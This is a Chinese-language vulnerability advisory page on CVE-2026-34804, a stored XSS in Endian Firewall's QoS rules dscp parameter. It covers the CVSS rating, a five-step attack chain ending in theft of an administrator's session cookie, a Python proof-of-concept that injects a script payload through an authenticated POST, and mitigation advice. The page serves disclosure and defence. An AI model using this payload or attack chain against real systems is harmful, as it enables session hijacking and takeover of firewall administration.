IPBUF安全漏洞报告
English
CVE-2026-34804 CVSS 6.4 中危

CVE-2026-34804 Endian Firewall存储型XSS漏洞

披露日期: 2026-04-02

漏洞信息

漏洞编号
CVE-2026-34804
漏洞类型
存储型跨站脚本攻击 (Stored XSS)
CVSS评分
6.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Endian Firewall

相关标签

XSS存储型XSSCVE-2026-34804Endian FirewallWeb安全中危漏洞

漏洞概述

Endian Firewall 3.3.25及之前版本存在存储型跨站脚本(XSS)漏洞。该漏洞位于/manage/qos/rules/路径的dscp参数中。由于系统未对用户输入进行充分的过滤和验证,经过身份认证的攻击者可以注入恶意JavaScript代码。当其他用户访问受影响页面时,恶意代码将被执行,可能导致会话劫持或敏感信息泄露。

技术细节

该漏洞属于存储型XSS(Stored XSS)。漏洞原理在于Endian Firewall在处理QOS规则配置请求时,对提交的`dscp`参数缺乏有效的输出编码或输入过滤机制。攻击者需拥有低权限账户(PR:L),通过网络(AV:N)向`/manage/qos/rules/`接口发送特制的HTTP请求。攻击者将恶意脚本植入`dscp`参数值中,系统直接将其存储在数据库或后端配置中。当具有管理权限或其他用户浏览QOS规则列表页面时,服务器会从数据库读取该参数并直接渲染到页面HTML中,导致浏览器解析并执行攻击者注入的恶意JavaScript代码。由于作用域为S:C,攻击者可能利用此漏洞窃取管理员Cookie,进而接管账户权限。

攻击链分析

STEP 1
侦察
攻击者识别目标为Endian Firewall系统,并确认其版本在3.3.25及以下。
STEP 2
获取凭证
攻击者通过钓鱼或社会工程学获取一个低权限账户的登录凭证。
STEP 3
漏洞利用
攻击者使用低权限账户登录,向/manage/qos/rules/发送包含恶意JavaScript的POST请求,利用dscp参数注入Payload。
STEP 4
Payload执行
当管理员或其他用户访问QOS规则管理页面时,服务器读取并渲染被污染的数据,触发浏览器执行恶意脚本。
STEP 5
达成目标
恶意脚本窃取管理员的Session Cookie或执行其他恶意操作,攻击者借此提升权限或控制系统。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL vulnerable to Stored XSS target_url = "http://<target_ip>/manage/qos/rules/" # Authentication cookies (Low-privileged account required) cookies = { "ECSID": "<valid_session_cookie>" } # Malicious payload injected via the 'dscp' parameter # Using a simple script tag to demonstrate execution payload_data = { "action": "save", "dscp": "\"><script>alert(document.cookie);</script>", "interface": "eth0" } try: # Send POST request to store the malicious payload response = requests.post(target_url, data=payload_data, cookies=cookies) if response.status_code == 200: print("[+] Payload successfully injected.") print("[!] The XSS will trigger when an admin views the QOS rules page.") else: print(f"[-] Injection failed. Status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")

影响范围

Endian Firewall <= 3.3.25

防御指南

临时缓解措施
在未升级版本之前,建议管理员严格限制对QOS规则管理页面的访问权限,仅信任内部IP或特定管理员账户。此外,应定期审计系统日志,检查是否存在异常的规则修改记录,并暂时禁用非必要的Web管理界面访问。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表